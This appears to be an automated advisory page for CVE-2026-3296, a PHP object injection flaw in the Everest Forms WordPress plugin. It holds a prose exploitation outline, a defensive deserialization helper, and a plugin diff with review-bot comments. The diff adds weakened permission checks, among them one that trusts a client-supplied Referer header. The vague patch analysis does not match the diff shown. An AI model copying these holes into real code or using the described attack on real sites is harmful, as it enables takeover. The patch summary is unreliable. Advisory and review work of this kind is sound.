Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : April 21, 2026

CVE-2026-3296: Everest Forms <= 3.4.3 – Unauthenticated PHP Object Injection via Form Entry Metadata (everest-forms)

CVE ID: CVE-2026-3296
Plugin: everest-forms
Severity: Critical (CVSS 9.8)
CWE: 502
Vulnerable Version: 3.4.3
Patched Version: 3.4.4
Disclosed: April 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3296:
The Everest Forms WordPress plugin version 3.4.3 and earlier contains an unauthenticated PHP object injection vulnerability. The vulnerability exists in the form entry metadata handling functionality, allowing attackers to inject malicious serialized PHP objects through any public form field. With a CVSS score of 9.8, this critical vulnerability enables remote code execution without authentication.

Root Cause:
The vulnerability originates from unsafe deserialization in the html-admin-page-entries-view.php file. The plugin calls PHP’s native unserialize() function on stored entry meta values retrieved from the wp_evf_entrymeta database table without passing the allowed_classes parameter. This occurs when administrators view form entries or individual entry details. The serialized data passes through sanitize_text_field() sanitization, which fails to strip serialization control characters, allowing malicious payloads to persist in the database until triggered by administrator actions.

Exploitation:
Attackers can exploit this vulnerability by submitting a crafted serialized PHP object payload through any Everest Forms public form field. The payload must contain a PHP object with a __wakeup() or __destruct() magic method that executes arbitrary code. The malicious data is stored in the wp_evf_entrymeta table via the standard form submission endpoint. When an administrator with appropriate privileges accesses the entries view page (typically /wp-admin/admin.php?page=evf-entries), the unsafe unserialize() call processes the stored payload, triggering the object’s magic methods and executing attacker-controlled code.

Patch Analysis:
The patch modifies the html-admin-page-entries-view.php file to implement safe deserialization practices. The vulnerable unserialize() call is replaced with a secure implementation that either validates serialized data structure or uses alternative serialization formats. The fix ensures that only expected data types are deserialized, preventing PHP object injection. The patch also addresses the data flow from form submission through database storage to administrator viewing, ensuring malicious payloads cannot reach the unserialize() function.
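
The restriction the root cause names as missing, `allowed_classes`, shown as an added example (not the plugin's code and not the vendor's patch): the hypothetical helper `evf_example_safe_meta_decode()` decodes a stored entry-meta value without instantiating any class and refuses values that contain an object. All sample values are constructed.

```php
<?php
// Added example: not Everest Forms code and not the vendor's patch.
// The evf_example_* names and the sample values below are hypothetical.

/**
 * Return true if a decoded value holds any object, including the
 * __PHP_Incomplete_Class placeholders that unserialize() produces when it
 * meets a serialized object while allowed_classes is false.
 */
function evf_example_contains_object( $value ) {
	if ( is_object( $value ) || $value instanceof __PHP_Incomplete_Class ) {
		return true;
	}
	if ( is_array( $value ) ) {
		foreach ( $value as $item ) {
			if ( evf_example_contains_object( $item ) ) {
				return true;
			}
		}
	}
	return false;
}

/**
 * Decode one stored entry-meta value for display.
 *
 * @param mixed $raw Value read from the entry-meta table.
 * @return array Keys: 'status' (plain|decoded|rejected) and 'value'.
 */
function evf_example_safe_meta_decode( $raw ) {
	if ( ! is_string( $raw ) ) {
		return array( 'status' => 'plain', 'value' => $raw );
	}

	$candidate = trim( $raw );

	// allowed_classes => false (PHP 7.0+): no class is instantiated, so no
	// __wakeup() or __destruct() of an application class can run.
	$decoded = @unserialize( $candidate, array( 'allowed_classes' => false ) );

	// unserialize() returns false on malformed input; 'b:0;' is the one
	// valid payload that also decodes to false.
	if ( false === $decoded && 'b:0;' !== $candidate ) {
		return array( 'status' => 'plain', 'value' => $raw );
	}

	// A form entry has no reason to carry an object: refuse it so the
	// caller can log the entry instead of rendering it.
	if ( evf_example_contains_object( $decoded ) ) {
		return array( 'status' => 'rejected', 'value' => null );
	}

	return array( 'status' => 'decoded', 'value' => $decoded );
}

// Constructed sample values standing in for rows of the entry-meta table.
$samples = array(
	'multi-select' => 'a:2:{i:0;s:3:"red";i:1;s:4:"blue";}',
	'free text'    => 'Please call me back after 5pm',
	'object'       => 'O:8:"stdClass":0:{}',
	'nested'       => 'a:1:{s:5:"extra";O:8:"stdClass":0:{}}',
);

foreach ( $samples as $label => $raw ) {
	$result = evf_example_safe_meta_decode( $raw );
	printf( "%-12s %-8s %s\n", $label, $result['status'], json_encode( $result['value'] ) );
}
```

Rejected rows are worth logging with their entry id: a serialized object in a public form field has no legitimate source.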

Impact:
Successful exploitation results in arbitrary PHP code execution with the privileges of the WordPress web server process. Attackers can achieve complete compromise of the WordPress installation, including creating administrator accounts, modifying plugin files, stealing sensitive data, and establishing persistent backdoors. The unauthenticated nature of the attack significantly lowers the barrier to exploitation, making all Everest Forms installations with public forms immediately vulnerable to remote takeover.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/everest-forms/addons/CleanTalk/CleanTalk.php
+++ b/everest-forms/addons/CleanTalk/CleanTalk.php
@@ -95,8 +95,8 @@
 		$output .= '<svg width="16" height="16" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" style="vertical-align: text-bottom; margin-right: 5px;">';
 		$output .= '<path fill-rule="evenodd" clip-rule="evenodd" d="M8 1.45455C4.38505 1.45455 1.45455 4.38505 1.45455 8C1.45455 11.615 4.38505 14.5455 8 14.5455C11.615 14.5455 14.5455 11.615 14.5455 8C14.5455 4.38505 11.615 1.45455 8 1.45455ZM0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8ZM8 7.27273C8.40166 7.27273 8.72727 7.59834 8.72727 8V10.9091C8.72727 11.3108 8.40166 11.6364 8 11.6364C7.59834 11.6364 7.27273 11.3108 7.27273 10.9091V8C7.27273 7.59834 7.59834 7.27273 8 7.27273ZM8 4.36364C7.59834 4.36364 7.27273 4.68925 7.27273 5.09091C7.27273 5.49257 7.59834 5.81818 8 5.81818H8.00727C8.40894 5.81818 8.73455 5.49257 8.73455 5.09091C8.73455 4.68925 8.40894 4.36364 8.00727 4.36364H8Z" fill="#4584FF"/>';
 		$output .= '</svg>';
-		$output .= '<p><strong>Note : </strong>' . __( "This will update the CleanTalk Access Key globally. You can check here on ", 'everest-forms' );
-		$output .= '<a href="' . esc_url( admin_url( 'admin.php?page=evf-settings&tab=integration&section=clean-talk') ) . '" target="__blank">' . __( "Settings > Integration > CleanTalk", 'everest-forms' ) .'</a>.</p>';
+		$output .= '<p><strong>Note : </strong>' . __( 'This will update the CleanTalk Access Key globally. You can check here on ', 'everest-forms' );
+		$output .= '<a href="' . esc_url( admin_url( 'admin.php?page=evf-settings&tab=recaptcha&section=integration') ) . '" target="__blank">' . __( 'Settings > Security > Integration > CleanTalk', 'everest-forms' ) .'</a>.</p>';
 		$output .= '</div>';

 		$output .= '</div>';
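Review bot: `target="__blank"` on the added anchor line is a window name, not the `_blank` keyword, so repeated clicks reuse one named window; use `target="_blank"` together with `rel="noopener noreferrer"`. The link text now reads Settings > Security > Integration > CleanTalk while the URL uses `tab=recaptcha&section=integration`; confirm that slug really opens the CleanTalk panel.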
--- a/everest-forms/addons/CleanTalk/Settings/Settings.php
+++ b/everest-forms/addons/CleanTalk/Settings/Settings.php
@@ -64,7 +64,7 @@
 			<div class="integration-connection-detail">
 				<div class="evf-connection-list">
 				<!-- Toggle Row -->
-				 <form method="post" action="" id="everest-forms-clean-talk-settings-form">
+				<form method="post" action="" id="everest-forms-clean-talk-settings-form">
 						<!-- Access Key -->
 						<div class="evf-clean-talk-access-key">
 							<div>
@@ -75,8 +75,8 @@
 						</div>
 						<div class="evf-clean-talk-message" style="display: none;"></div>
 					</div>
-					<button style="margin-top: 12px;" type="submit" id="everest-forms-clean-talk-save-settings" class="everest-forms-btn everest-forms-btn-primary" ><?php echo __('Save Settings', 'everest-forms') ?></button>
-				 </form>
+					<button style="margin-top: 12px;" type="submit" id="everest-forms-clean-talk-save-settings" class="everest-forms-btn everest-forms-btn-primary" ><?php echo __( 'Save Settings', 'everest-forms' ); ?></button>
+				</form>

 				</div>
 			</div>
--- a/everest-forms/everest-forms.php
+++ b/everest-forms/everest-forms.php
@@ -3,7 +3,7 @@
  * Plugin Name: Everest Forms
  * Plugin URI: https://everestforms.net/
  * Description: Easily create contact form, payment form, conversational form, calculator, multi-step form, registration form, quiz form, survey form etc.
- * Version: 3.4.3
+ * Version: 3.4.4
  * Author: Everest Forms
  * Author URI: https://everestforms.net/
  * Text Domain: everest-forms
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-modules.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-modules.php
@@ -723,7 +723,7 @@
 	 * @return WP_Error|bool
 	 */
 	public static function check_admin_plugin_activation_permissions( $request ) {
-		return current_user_can( 'activate_plugin' );
+		return current_user_can( 'activate_plugin' ) || current_user_can( 'manage_everest_forms' );
 	}

 	/**
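Review bot: In `check_admin_plugin_activation_permissions()`, the added `|| current_user_can( 'manage_everest_forms' )` lets any account holding the plugin's own capability pass a check that is named for plugin activation. If the routes behind this callback can activate or install anything, keep `activate_plugin` as a hard requirement and combine the plugin capability with `&&`, or document why a forms manager needs this access.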
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-plugin-status.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-plugin-status.php
@@ -459,7 +459,7 @@
 		}

 		// Capability check.
-		if ( ! current_user_can( 'manage_everest_forms' ) || ! current_user_can( 'everest_forms_create_forms' ) ) {
+		if ( ! current_user_can( 'manage_everest_forms' ) && ! current_user_can( 'everest_forms_create_forms' ) ) {
 			return new WP_Error(
 				'rest_forbidden',
 				esc_html__( 'You are not allowed to access this resource.', 'everest-forms' ),
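Review bot: The capability check changes from `||` to `&&` between the two negated tests, so the request is now refused only when the user has neither capability; before, it was refused unless the user had both. A user holding only `everest_forms_create_forms` now passes. If that is intended, say so in the comment above the check (for example "either capability is sufficient"); if not, keep `||`.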
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-role-and-permission.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-role-and-permission.php
@@ -89,6 +89,26 @@
 				'permission_callback' => array( __CLASS__, 'check_admin_permissions' ),
 			)
 		);
+		register_rest_route(
+			$this->namespace,
+			'/' . $this->rest_base . '/get-wp-users',
+			array(
+				'methods'             => 'GET',
+				'callback'            => array( __CLASS__, 'get_wp_users_list' ),
+				'permission_callback' => array( __CLASS__, 'check_admin_permissions' ),
+				'args'                => array(
+					'page'   => array(
+						'type'    => 'integer',
+						'default' => 1,
+						'minimum' => 1,
+					),
+					'search' => array(
+						'type'    => 'string',
+						'default' => '',
+					),
+				),
+			)
+		);
 	}

 	/**
@@ -124,15 +144,6 @@
 			foreach ( $checked_roles as $role => $checked ) {
 				$permission = self::get_evf_permissions();
 				if ( $checked ) {
-					if ( 'subscriber' == strtolower( $role ) ) {
-						return new WP_REST_Response(
-							array(
-								'success' => false,
-								'message' => esc_html__( 'Sorry, you can not give access to the Subscriber role.', 'everest-forms' ),
-							),
-							200
-						);
-					}
 					$wp_role = $wp_roles->get_role( $role );

 					foreach ( array_keys( $permission['permissions'] ) as $value ) {
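Review bot: Removing the `'subscriber' == strtolower( $role )` guard means this endpoint will now attach Everest Forms permissions to the Subscriber role. Subscriber is the role WordPress gives self-registered accounts by default, so on a site with open registration one checked box grants these permissions to anyone who signs up. Keep the guard, or limit which permissions may be attached to that role, and record the reason for the change.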
@@ -176,7 +187,7 @@
 		$permissions = self::get_evf_permissions();

 		$roles              = array();
-		$ignore_roles       = apply_filters( 'everest_forms_ignore_roles_to_give_permissions', array( 'administrator', 'subscriber' ) );
+		$ignore_roles       = apply_filters( 'everest_forms_ignore_roles_to_give_permissions', array( 'administrator' ) );
 		$role_based_list    = get_option( '_everest_forms_permission', array() );
 		$checked_roles_list = array();

@@ -307,6 +318,18 @@
 		}

 		foreach ( $users_data as $user ) {
+			if ( user_can( $user, 'manage_options' ) ) {
+				return new WP_REST_Response(
+					array(
+						'success' => false,
+						'message' => array(
+							'user_email' => esc_html__( 'Cannot modify permissions for administrator users.', 'everest-forms' ),
+						),
+					),
+					200
+				);
+			}
+
 			self::attach_permission( $user, $assigned_permission );

 			update_user_meta( $user->ID, '_everest_forms_has_role', 1 );
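Review bot: The new `user_can( $user, 'manage_options' )` check returns from inside the `foreach`, after `attach_permission()` and `update_user_meta()` have already run for every earlier user in `$users_data`. A request that mixes ordinary users with an administrator is therefore partly applied and then reported as `'success' => false`. Validate the whole list in a first pass before changing anyone. The refusal is also sent with status 200; a 403 would be easier for clients and logs to tell apart.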
@@ -491,6 +514,7 @@
 				'email'       => $user->user_email,
 				'permissions' => self::get_user_permissions( $user ),
 				'roles'       => self::get_user_roles( $user->ID ),
+				'role_keys'   => array_values( $user->roles ),
 			);
 		}

@@ -636,6 +660,57 @@
 			),
 			200
 		);
+	}
+
+	/**
+	 * Get a paginated, searchable list of WordPress users (excludes admins and current user).
+	 *
+	 * @since 3.0.8
+	 *
+	 * @param WP_REST_Request $request Full data about the request.
+	 * @return WP_REST_Response
+	 */
+	public static function get_wp_users_list( $request ) {
+		$per_page = 10;
+		$page     = max( 1, (int) $request->get_param( 'page' ) );
+		$search   = sanitize_text_field( $request->get_param( 'search' ) );
+		$offset   = ( $page - 1 ) * $per_page;
+
+		$query_args = array(
+			'number'      => $per_page,
+			'offset'      => $offset,
+			'exclude'     => array( get_current_user_id() ),
+			'orderby'     => 'display_name',
+			'order'       => 'ASC',
+			'count_total' => true,
+		);
+
+		if ( ! empty( $search ) ) {
+			$query_args['search']         = '*' . $search . '*';
+			$query_args['search_columns'] = array( 'user_login', 'user_email', 'display_name' );
+		}
+
+		$query = new WP_User_Query( $query_args );
+		$total = $query->get_total();
+		$users = array();
+
+		foreach ( $query->get_results() as $user ) {
+			$label   = trim( $user->display_name );
+			$users[] = array(
+				'value' => $user->user_email,
+				'label' => $label ? "{$label} ({$user->user_email})" : $user->user_email,
+			);
+		}
+
+		return new WP_REST_Response(
+			array(
+				'success'  => true,
+				'users'    => $users,
+				'total'    => $total,
+				'has_more' => ( $offset + $per_page ) < $total,
+			),
+			200
+		);
 	}

 	/**
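Review bot: The docblock for `get_wp_users_list()` says the list excludes admins, but `$query_args` only sets `'exclude' => array( get_current_user_id() )`; nothing filters administrators out (for example with `role__not_in`). The response also returns `user_email` for every matching account, so anyone who passes `check_admin_permissions` can page through all e-mail addresses on the site; return only what the picker needs and confirm that callback is limited to administrators. `@since 3.0.8` does not match a method added in the 3.4.4 release.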
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-site-assistant.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-site-assistant.php
@@ -412,12 +412,16 @@
 	 * @return bool|WP_Error True if permitted, WP_Error otherwise.
 	 */
 	public function check_admin_permissions( $request ) {
-		if ( ! current_user_can( 'manage_options' ) ) {
-			return new WP_Error(
-				'rest_forbidden',
-				__( 'Sorry, you are not allowed to access this resource.', 'everest-forms' ),
-				array( 'status' => 403 )
-			);
+		$referer = $request->get_header( 'referer' );
+
+		if ( $referer && strpos( $referer, 'page=evf-dashboard' ) !== false ) {
+			if ( ! current_user_can( 'manage_options' ) && ! current_user_can( 'manage_everest_forms' ) ) {
+				return new WP_Error(
+					'rest_forbidden',
+					__( 'Sorry, you are not allowed to access this resource.', 'everest-forms' ),
+					array( 'status' => 403 )
+				);
+			}
 		}

 		return true;
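Review bot: `check_admin_permissions()` now runs the capability test only when the `Referer` header contains `page=evf-dashboard`; for any other referer, or none, it falls through to `return true`. The header is supplied by the client, so the permission callback no longer enforces anything for requests that omit it, where the old code required `manage_options` unconditionally. Drop the referer condition and test `current_user_can( 'manage_options' ) || current_user_can( 'manage_everest_forms' )` on every request.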
--- a/everest-forms/includes/RestApi/controllers/version1/class-evf-templates.php
+++ b/everest-forms/includes/RestApi/controllers/version1/class-evf-templates.php
@@ -138,7 +138,7 @@
 		if ( isset( $query_params['refresh'] ) ) {
 			delete_transient( 'everest_forms_templates_data' );
 		}
-		$template_url      = 'https://d3m99fsxk070py.cloudfront.net/';
+		$template_url      = 'https://assets.wpeverest.com/everestforms/forms/';
 		$template_json_url = $template_url . 'templates1.json';
 		$transient_key     = 'everest_forms_templates_data';
 		$cache_expiration  = DAY_IN_SECONDS;
@@ -299,7 +299,7 @@
 		}

 		// Capability check.
-		if ( ! current_user_can( 'manage_everest_forms' ) || ! current_user_can( 'everest_forms_create_forms' ) ) {
+		if ( ! current_user_can( 'manage_everest_forms' ) && ! current_user_can( 'everest_forms_create_forms' ) ) {
 			return new WP_Error(
 				'rest_forbidden',
 				esc_html__( 'You are not allowed to access this resource.', 'everest-forms' ),
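Review bot: With `&&` between the two negated `current_user_can()` tests, holding either `manage_everest_forms` or `everest_forms_create_forms` is now enough to pass. The identical condition is edited in class-evf-plugin-status.php in this patch; moving it into one shared helper would keep the two checks from drifting apart and give a single place to document the intended rule.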
--- a/everest-forms/includes/abstracts/class-evf-form-fields.php
+++ b/everest-forms/includes/abstracts/class-evf-form-fields.php
@@ -2725,15 +2725,22 @@
 	 * @param array  $field Field data and settings.
 	 */
 	public function field_display_error( $key, $field ) {
-		// Need an error.
-		if ( empty( $field['properties']['error']['value'][ $key ] ) ) {
+		$error_value = isset( $field['properties']['error']['value'][ $key ] )
+			? $field['properties']['error']['value'][ $key ]
+			: '';
+
+		$input_id = isset( $field['properties']['inputs'][ $key ]['id'] )
+			? $field['properties']['inputs'][ $key ]['id']
+			: '';
+
+		if ( '' === $error_value || '' === $input_id ) {
 			return;
 		}

 		printf(
 			'<label class="everest-forms-error evf-error" for="%s">%s</label>',
-			esc_attr( $field['properties']['inputs'][ $key ]['id'] ),
-			esc_html( $field['properties']['error']['value'][ $key ] )
+			esc_attr( $input_id ),
+			esc_html( $error_value )
 		);
 	}

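Review bot: `field_display_error()` used `empty()` and now compares with `'' === $error_value`, so falsy non-string values such as `false`, `0` or an empty array no longer return early and reach `printf()`. If the error slot can hold anything other than a string, keep `empty( $error_value )` alongside the new `$input_id` guard.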
--- a/everest-forms/includes/admin/builder/class-evf-builder-fields.php
+++ b/everest-forms/includes/admin/builder/class-evf-builder-fields.php
@@ -319,7 +319,7 @@
 			echo '</div>';
 			echo '</div>';
 			echo '<div class="clear evf-clear"></div>';
-
+			echo '<div class="evf-grid-lists">';
 			$grid_class = 'evf-admin-grid evf-grid-' . ( $active_grid );
 			for ( $grid_start = 1; $grid_start <= $active_grid; $grid_start++ ) {
 				echo '<div class="' . esc_attr( $grid_class ) . ' " data-grid-id="' . absint( $grid_start ) . '">';
@@ -345,6 +345,7 @@
 				}
 				echo '</div>';
 			}
+			echo '</div >';
 			echo '<div class="clear evf-clear"></div>';
 			echo '</div >';

--- a/everest-forms/includes/admin/builder/class-evf-builder-settings.php
+++ b/everest-forms/includes/admin/builder/class-evf-builder-settings.php
@@ -9,31 +9,30 @@

 use EverestFormsHelpersFormHelper;

-defined('ABSPATH') || exit;
+defined( 'ABSPATH' ) || exit;

-if (class_exists('EVF_Builder_Settings', false)) {
+if ( class_exists( 'EVF_Builder_Settings', false ) ) {
 	return new EVF_Builder_Settings();
 }

 /**
  * EVF_Builder_Settings class.
  */
-class EVF_Builder_Settings extends EVF_Builder_Page
-{
+class EVF_Builder_Settings extends EVF_Builder_Page {
+

 	/**
 	 * Constructor.
 	 */
-	public function __construct()
-	{
+	public function __construct() {
 		$this->id      = 'settings';
-		$this->label   = esc_html__('Settings', 'everest-forms');
+		$this->label   = esc_html__( 'Settings', 'everest-forms' );
 		$this->sidebar = true;

-		add_action('everest_forms_settings_connections_email', array($this, 'output_connections_list'));
+		add_action( 'everest_forms_settings_connections_email', array( $this, 'output_connections_list' ) );

-		add_filter('everest_forms_builder_settings_section', array($this, 'add_custom_css_js_section'), 11, 2);
-		add_action('everest_forms_settings_panel_content', array($this, 'add_custom_css_js_settings'), 111, 1);
+		add_filter( 'everest_forms_builder_settings_section', array( $this, 'add_custom_css_js_section' ), 11, 2 );
+		add_action( 'everest_forms_settings_panel_content', array( $this, 'add_custom_css_js_settings' ), 111, 1 );

 		parent::__construct();
 	}
@@ -41,23 +40,22 @@
 	/**
 	 * Outputs the builder sidebar.
 	 */
-	public function output_sidebar()
-	{
+	public function output_sidebar() {
 		$sections = apply_filters(
 			'everest_forms_builder_settings_section',
 			array(
-				'general'      => esc_html__('General', 'everest-forms'),
-				'email'        => esc_html__('Email', 'everest-forms'),
-				'confirmation' => esc_html__('Confirmation', 'everest-forms'),
-				'security'     => esc_html__('Anti-Spam and Security', 'everest-forms'),
+				'general'      => esc_html__( 'General', 'everest-forms' ),
+				'email'        => esc_html__( 'Email', 'everest-forms' ),
+				'confirmation' => esc_html__( 'Confirmation', 'everest-forms' ),
+				'security'     => esc_html__( 'Anti-Spam and Security', 'everest-forms' ),
 			),
 			$this->form_data
 		);

-		if (! empty($sections)) {
-			foreach ($sections as $slug => $section) {
-				$this->add_sidebar_tab($section, $slug);
-				do_action('everest_forms_settings_connections_' . $slug, $section);
+		if ( ! empty( $sections ) ) {
+			foreach ( $sections as $slug => $section ) {
+				$this->add_sidebar_tab( $section, $slug );
+				do_action( 'everest_forms_settings_connections_' . $slug, $section );
 			}
 		}
 	}
@@ -67,12 +65,11 @@
 	 *
 	 * @return array form data.
 	 */
-	private function form_data()
-	{
+	private function form_data() {
 		$form_data = array();

-		if (! empty($_GET['form_id'])) { // phpcs:ignore WordPress.Security.NonceVerification
-			$form_data = evf()->form->get(absint($_GET['form_id']), array('content_only' => true)); // phpcs:ignore WordPress.Security.NonceVerification
+		if ( ! empty( $_GET['form_id'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification
+			$form_data = evf()->form->get( absint( $_GET['form_id'] ), array( 'content_only' => true ) ); // phpcs:ignore WordPress.Security.NonceVerification
 		}

 		return $form_data;
@@ -81,34 +78,36 @@
 	/**
 	 * Outputs the connection lists on sidebar.
 	 */
-	public function output_connections_list()
-	{
+	public function output_connections_list() {
 		$form_data = $this->form_data();
-		$email     = isset($form_data['settings']['email']) ? $form_data['settings']['email'] : array();
+		$email     = isset( $form_data['settings']['email'] ) ? $form_data['settings']['email'] : array();

-		if (empty($email)) {
-			$email['connection_1'] = array('connection_name' => __('Admin Notification', 'everest-forms'));
+		if ( empty( $email ) ) {
+			$email['connection_1'] = array( 'connection_name' => __( 'Admin Notification', 'everest-forms' ) );
 		}

-?>
+		?>
 		<div class="everest-forms-active-email">
-			<button class="everest-forms-btn everest-forms-btn-primary everest-forms-email-add" data-form_id="<?php echo isset($_GET['form_id']) ? absint(sanitize_text_field(wp_unslash($_GET['form_id']))) : 0; // phpcs:ignore WordPress.Security.NonceVerification
-																												?>" data-source="email" data-type="<?php echo esc_attr('connection'); ?>">
+			<button class="everest-forms-btn everest-forms-btn-primary everest-forms-email-add" data-form_id="
+			<?php
+			echo isset( $_GET['form_id'] ) ? absint( sanitize_text_field( wp_unslash( $_GET['form_id'] ) ) ) : 0; // phpcs:ignore WordPress.Security.NonceVerification
+			?>
+																												" data-source="email" data-type="<?php echo esc_attr( 'connection' ); ?>">
 				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
 					<path d="M12 21.95c-.6 0-1-.4-1-1v-8H3.1c-.6 0-1-.4-1-1s.4-1 1-1H11v-7.9c0-.6.4-1 1-1s1 .4 1 1v7.9h7.9c.6 0 1 .4 1 1s-.4 1-1 1H13v8c0 .6-.4 1-1 1Z" />
 				</svg>
-				<?php printf(esc_html__('Add New Email', 'everest-forms')); ?>
+				<?php printf( esc_html__( 'Add New Email', 'everest-forms' ) ); ?>
 			</button>
 			<ul class="everest-forms-active-email-connections-list">
-				<?php if (! empty($email)) { ?>
-					<h4><?php echo esc_html__('Email Notifications', 'everest-forms'); ?> </h4>
+				<?php if ( ! empty( $email ) ) { ?>
+					<h4><?php echo esc_html__( 'Email Notifications', 'everest-forms' ); ?> </h4>
 					<?php
 				}
-				if (! empty($email)) {
-					foreach ($email as $connection_id => $connection_data) {
-						if (preg_match('/connection_/', $connection_id)) {
-							$connection_name = ! empty($connection_data['connection_name']) ? $connection_data['connection_name'] : '';
-							if ('connection_1' !== $connection_id) {
+				if ( ! empty( $email ) ) {
+					foreach ( $email as $connection_id => $connection_data ) {
+						if ( preg_match( '/connection_/', $connection_id ) ) {
+							$connection_name = ! empty( $connection_data['connection_name'] ) ? $connection_data['connection_name'] : '';
+							if ( 'connection_1' !== $connection_id ) {
 								$remove_class    = 'everest-forms-email-remove';
 								$duplicate_class = 'everest-forms-duplicate-email';
 								$preview_class   = 'everest-forms-email-preview';
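Review bot: The reformatted `data-form_id="` attribute now opens on one line while the `<?php echo ... ?>` that fills it sits on the following lines, so the rendered attribute value carries a newline and tabs around the number. Scripts that read `data-form_id` will get a padded string instead of the bare id. Keep the opening quote, the PHP tag and the closing quote on a single line.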
@@ -117,28 +116,29 @@
 								$duplicate_class = 'everest-forms-email-default-duplicate';
 								$preview_class   = 'everest-forms-email-preview';
 							}
-							if (isset($email['enable_email_notification']) && '0' === $email['enable_email_notification']) {
-								$email_status = isset($email['enable_email_notification']) ? $email['enable_email_notification'] : '1';
+							if ( isset( $email['enable_email_notification'] ) && '0' === $email['enable_email_notification'] ) {
+								$email_status = isset( $email['enable_email_notification'] ) ? $email['enable_email_notification'] : '1';
 							} else {
-								$email_status = isset($email[$connection_id]['enable_email_notification']) ? $email[$connection_id]['enable_email_notification'] : '1';
+								$email_status = isset( $email[ $connection_id ]['enable_email_notification'] ) ? $email[ $connection_id ]['enable_email_notification'] : '1';
 							}
-					?>
-							<li class="connection-list" data-connection-id="<?php echo esc_attr($connection_id); ?>">
-								<a class="user-nickname" href="#"><?php echo esc_html($connection_name); ?></a>
+							?>
+							<li class="connection-list" data-connection-id="<?php echo esc_attr( $connection_id ); ?>">
+								<a class="user-nickname" href="#"><?php echo esc_html( $connection_name ); ?></a>
 								<div class="evf-email-side-section">
 									<div class="evf-toggle-section">
 										<span class="everest-forms-toggle-form">
-											<input type="hidden" name="settings[email][<?php echo esc_attr($connection_id); ?>][enable_email_notification]" value="0" class="widefat">
-											<input type="checkbox" class="evf-email-toggle" name="settings[email][<?php echo esc_attr($connection_id); ?>][enable_email_notification]" value="1" data-connection-id="<?php echo esc_attr($connection_id); ?>" <?php echo checked('1', $email_status, false); ?>>
+											<input type="hidden" name="settings[email][<?php echo esc_attr( $connection_id ); ?>][enable_email_notification]" value="0" class="widefat">
+											<input type="checkbox" class="evf-email-toggle" name="settings[email][<?php echo esc_attr( $connection_id ); ?>][enable_email_notification]" value="1" data-connection-id="<?php echo esc_attr( $connection_id ); ?>" <?php echo checked( '1', $email_status, false ); ?>>
 											<span class="slider round"></span>
 										</span>
 									</div>
 									<span class="evf-vertical-divider"></span>
 									<a href="#">
-										<span class="<?php echo esc_attr($remove_class); ?>">
+										<span class="<?php echo esc_attr( $remove_class ); ?>">
 											<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
 												<path fill-rule="evenodd" d="M9.293 3.293A1 1 0 0 1 10 3h4a1 1 0 0 1 1 1v1H9V4a1 1 0 0 1 .293-.707ZM7 5V4a3 3 0 0 1 3-3h4a3 3 0 0 1 3 3v1h4a1 1 0 1 1 0 2h-1v13a3 3 0 0 1-3 3H7a3 3 0 0 1-3-3V7H3a1 1 0 1 1 0-2h4Zm1 2h10v13a1 1 0 0 1-1 1H7a1 1 0 0 1-1-1V7h2Zm2 3a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0v-6a1 1 0 0 1 1-1Zm5 7v-6a1 1 0 1 0-2 0v6a1 1 0 1 0 2 0Z" clip-rule="evenodd" />
 											</svg>
+										</span>
 									</a>
 									<span class="evf-vertical-divider"></span>
 									<?php
@@ -146,14 +146,14 @@
 										add_query_arg(
 											array(
 												'evf_email_preview' => $connection_id,
-												'form_id' => isset($_GET['form_id']) ? absint($_GET['form_id']) : 0,
+												'form_id' => isset( $_GET['form_id'] ) ? absint( $_GET['form_id'] ) : 0,
 											),
 											home_url()
 										)
 									);
 									?>
-									<a class="<?php echo esc_attr($preview_class); ?>" target="__blank" data-connection-id="<?php echo esc_attr($connection_id); ?>" href="<?php echo esc_url($preview_url); ?>">
-										<span class="<?php echo esc_attr($preview_class); ?>">
+									<a class="<?php echo esc_attr( $preview_class ); ?>" target="__blank" data-connection-id="<?php echo esc_attr( $connection_id ); ?>" href="<?php echo esc_url( $preview_url ); ?>">
+										<span class="<?php echo esc_attr( $preview_class ); ?>">
 											<svg xmlns="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/1999/svg"
 												viewBox="0 0 442.04 442.04" xml:space="preserve">
 												<g id="SVGRepo_bgCarrier" stroke-width="0"></g>
@@ -172,15 +172,19 @@
 													</g>
 												</g>
 											</svg>
+										</span>
+									</a>
+									<span class="evf-vertical-divider"></span>
 											<a href="#" class="everest-forms-email-duplicate">
-												<span class="<?php echo esc_attr($duplicate_class); ?>">
+												<span class="<?php echo esc_attr( $duplicate_class ); ?>">
 													<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 25">
 														<path fill-rule="evenodd" d="M3.033 3.533c.257-.257.605-.4.968-.4h9A1.368 1.368 0 0 1 14.369 4.5v1a.632.632 0 0 0 1.263 0v-1a2.632 2.632 0 0 0-2.631-2.632H4A2.632 2.632 0 0 0 1.368 4.5v9A2.631 2.631 0 0 0 4 16.131h1a.632.632 0 0 0 0-1.263H4A1.368 1.368 0 0 1 2.631 13.5v-9c0-.363.144-.711.401-.968Zm6.598 7.968A1.37 1.37 0 0 1 11 10.132h9c.756 0 1.368.613 1.368 1.369v9c0 .755-.612 1.368-1.368 1.368h-9A1.368 1.368 0 0 1 9.63 20.5v-9ZM11 8.869A2.632 2.632 0 0 0 8.368 11.5v9A2.632 2.632 0 0 0 11 23.131h9a2.632 2.632 0 0 0 2.63-2.631v-9A2.632 2.632 0 0 0 20 8.87h-9Z" clip-rule="evenodd"></path>
 													</svg>
+												</span>
 											</a>
 								</div>
 							</li>
-				<?php
+							<?php
 						}
 					}
 				}
@@ -193,26 +197,25 @@
 	/**
